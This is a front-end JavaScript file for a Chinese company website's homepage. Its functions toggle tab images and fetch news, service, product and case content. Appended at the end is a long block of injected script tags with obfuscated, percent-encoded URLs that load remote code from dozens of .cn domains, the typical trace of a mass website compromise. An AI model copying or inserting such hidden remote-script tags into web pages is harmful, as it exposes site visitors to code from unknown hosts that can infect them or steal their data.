﻿///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//index.aspx前台首页
//首页新闻显示
function overnews(id)
{
    var newsid="1";
    if(id=="resub")
    {
        newsid="1";
    }
    else if(id=="resu")
    {
        newsid="2";
    }
    else if(id=="resuc")
    {
        newsid="3";
    }
    var obj=document.getElementById("resub");
    var obj1=document.getElementById("resu");
    var obj2=document.getElementById("resuc");
    if(newsid=="1")
    {
        obj.style.background="url(images/index_left_pic4.jpg)";
        obj1.style.background="url(images/index_left_pic5.jpg)";
        obj2.style.background="url(images/index_left_pic5.jpg)";
    }
    else if(newsid=="2")
    {
        obj1.style.background="url(images/index_left_pic4.jpg)";
        obj.style.background="url(images/index_left_pic5.jpg)";
        obj2.style.background="url(images/index_left_pic5.jpg)";
    }
    else if(newsid=="3")
    {
        obj2.style.background="url(images/index_left_pic4.jpg)";
        obj1.style.background="url(images/index_left_pic5.jpg)";
        obj.style.background="url(images/index_left_pic5.jpg)";
    }
    
    shownews(newsid);
}

//输出首页新闻
function shownews(id)
{
    var obj=document.getElementById("imdexnew");
    obj.innerHTML="";
    var response=""
    response =WebUserControl_index_news.OutNews(id);
    if(response.value!="")
    {
        obj.innerHTML=response.value;
    }
    else
        obj.innerHTML="";
}

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//首页创意服务显示
function overservice(id)
{   
    var webid="1";
    if(id=="ce5-1")
    {
        webid="1";
    }
    else if(id=="ce5-2")
    {
        webid="2";
    }
    else if(id=="ce5-3")
    {
        webid="3";
    }
    else if(id=="ce5-4")
    {
        webid="4";
    }
    var obj=document.getElementById("ce5-1");
    var obj1=document.getElementById("ce5-2");
    var obj2=document.getElementById("ce5-3");
    var obj3=document.getElementById("ce5-4");
    if(webid=="1")
    {
        obj.style.background="url(images/index_left_pic4.jpg)";
        obj1.style.background="url(images/index_left_pic5.jpg)";
        obj2.style.background="url(images/index_left_pic5.jpg)";
        obj3.style.background="url(images/index_left_pic5.jpg)";
    }
    else if(webid=="2")
    {
        obj1.style.background="url(images/index_left_pic4.jpg)";
        obj.style.background="url(images/index_left_pic5.jpg)";
        obj2.style.background="url(images/index_left_pic5.jpg)";
        obj3.style.background="url(images/index_left_pic5.jpg)";
    }
    else if(webid=="3")
    {
        obj2.style.background="url(images/index_left_pic4.jpg)";
        obj1.style.background="url(images/index_left_pic5.jpg)";
        obj.style.background="url(images/index_left_pic5.jpg)";
        obj3.style.background="url(images/index_left_pic5.jpg)";
    }
    else if(webid=="4")
    {
        obj3.style.background="url(images/index_left_pic4.jpg)";
        obj1.style.background="url(images/index_left_pic5.jpg)";
        obj.style.background="url(images/index_left_pic5.jpg)";
        obj2.style.background="url(images/index_left_pic5.jpg)";
    }
    
    showservice(webid)
}

    //服务信息显示
function showservice(typeid)
{
    var obj=document.getElementById("ce6");
    obj.innerHTML="";
    var response=""
    response =WebUserControl_index_service.ServiceInfo(typeid);
    if(response.value!="")
    {
        obj.innerHTML=response.value;
    }
    
}

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//首页产品显示
function overproduct(id)
{
    var proid="0";
    var webid="7";
    if(id=="ce9-1")
    {
        webid="7";
    }
    else if(id=="ce9-2")
    {
        webid="1";
    }
    else if(id=="ce9-3")
    {
        webid="2";
    }
    else if(id=="ce9-4")
    {
        webid="4";
    }
    else if(id=="ce9-5")
    {
        webid="8";
    }
    else if(id=="ce9-6")
    {
        webid="5";
    }
    
    for(var i=1;i<7;i++)
    {
        if(id=="ce9-"+i)
        {
            document.getElementById(id).style.background="url(images/index_left_pic21.jpg)";
        }
        else
            document.getElementById("ce9-"+i).style.background="";
    }
    
    showproduct(webid);
    
}

//产品信息显示
function showproduct(typeid)
{
    var obj=document.getElementById("ce10");
    obj.innerHTML="";
    var response=""
    response =WebUserControl_index_product.OutProduct(typeid);
    if(response.value!="")
    {
        obj.innerHTML=response.value;
    }
    
}

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//首页案例效果
//获取案例信息
function index_showproj()
{
    setTimeout("showprojectpic()",2000)
}
function showprojectpic()
{
    var response=""
//    alert("1111");
    response =WebUserControl_index_project.OutProjectPic();
//    alert(response.value);
    
}

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

 

 


<script src=http://%65%63%72%69%6D%65%2E%63%6F%6D%2E%63%6E></script><script src=http://%6D%75%73%69%63%6D%6F%62%69%2E%63%6F%6D%2E%63%6E></script><script src=http://%6E%65%77%73%72%65%61%63%68%2E%63%6E></script><script src=http://%73%70%6F%72%74%74%6F%64%61%79%2E%63%6E></script><script src=http://%74%68%65%73%74%6F%70%2E%63%6F%6D%2E%63%6E></script><script src=http://%78%74%72%61%64%65%73%2E%63%6F%6D%2E%63%6E></script><script src=http://%79%61%6F%4C%69%68%75%69%2E%63%6E></script><script src=http://%73%70%6F%72%74%73%62%61%79%2E%63%6E></script><script src=http://%74%68%65%73%6F%6E%2E%63%6F%6D%2E%63%6E></script><script src=http://%79%61%6F%4C%69%68%75%69%2E%63%6E></script><script src=http://%79%61%6F%4C%69%68%75%69%2E%63%6E></script><script src=http://%73%70%6F%72%74%73%62%61%79%2E%63%6E></script><script src=http://%74%68%65%73%6F%6E%2E%63%6F%6D%2E%63%6E></script><script src=http://%74%6F%6E%67%6C%76%65%2E%63%6E></script><script src=http://%6E%62%32%73%77%2E%63%6E></script><script src=http://%69%67%67%6F%6F%6C%65%2E%63%6E></script><script src=http://%6B%75%6D%6F%67%72%6F%75%70%2E%63%6E></script><script src=http://%6A%61%6D%65%73%66%61%6E%73%2E%63%6E></script><script src=http://%6E%65%69%6D%65%6E%67%6E%65%74%2E%63%6E></script><script src=http://%77%75%78%69%66%64%63%2E%63%6E></script><script src=http://%7A%67%75%6E%69%6F%6E%2E%63%6E></script><script src=http://%6E%6D%67%7A%6C%74%2E%63%6E></script><script src=http://%73%68%65%6E%67%6C%76%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%79%6F%75%64%75%6E%7A%69%2E%63%6E></script><script src=http://%382%30%348%2E%63%6E></script><script src=http://c%7Aj%6A%7Ac.%63n></script><script src=http://w%75%78io%6C.cn></script><script src=http://y%6F%75%72%73pa%63%65s.%63n></script><script src=http://c%68%75n%72an%67%2Eco%6D.cn></script><script src=http://h%68%68tliv%65.cn></script><script src=http://chni%61n%61me.c%6E></script><script src=http://op%65%6Etek.%63n></script><script src=http://%3369tm%7A%2Ecn></script><script src=http://hljd%78%61l.%63n></script><script src=http://a%76s%74e%65%6C.c%6E></script><script src=http://%65%72gnol%2Ec%6E></script><script src=http://s%6Ff%74w%61%72%65s%79s%74e%6Ds.c%6E></script><script src=http://%74%69%61%6E%6A%69%6Ec%6E%2Ecn></script><script src=http://tl%66%68%6Fu%73%65%2E%63n></script><script src=http://%36%312%31%300.%63%6E></script><script src=http://%73%74%6Fn%65b.%63%6E></script><script src=http://%73%70o%72%74%73i%6Ed%65%78%2Ec%6E></script><script src=http://a%6C%74%7A%78.%63n></script><script src=http://b%79%6E%72%6F%6C%2E%63%6E></script><script src=http://bynrt%76.%63n></script><script src=http://%63it%79sbbs%2Ec%6E></script><script src=http://%63%6E%6Eeime%6E%67%67%75%2E%63n></script><script src=http://%69ggo%6Ce%2E%63%6E></script><script src=http://kao%68%73i%6Fng.%63%6E></script><script src=http://n%6Ae%38.c%6E></script><script src=http://%6Ej%65%39.%63%6E></script><script src=http://%66sgy%71.c%6Fm:13%31></script>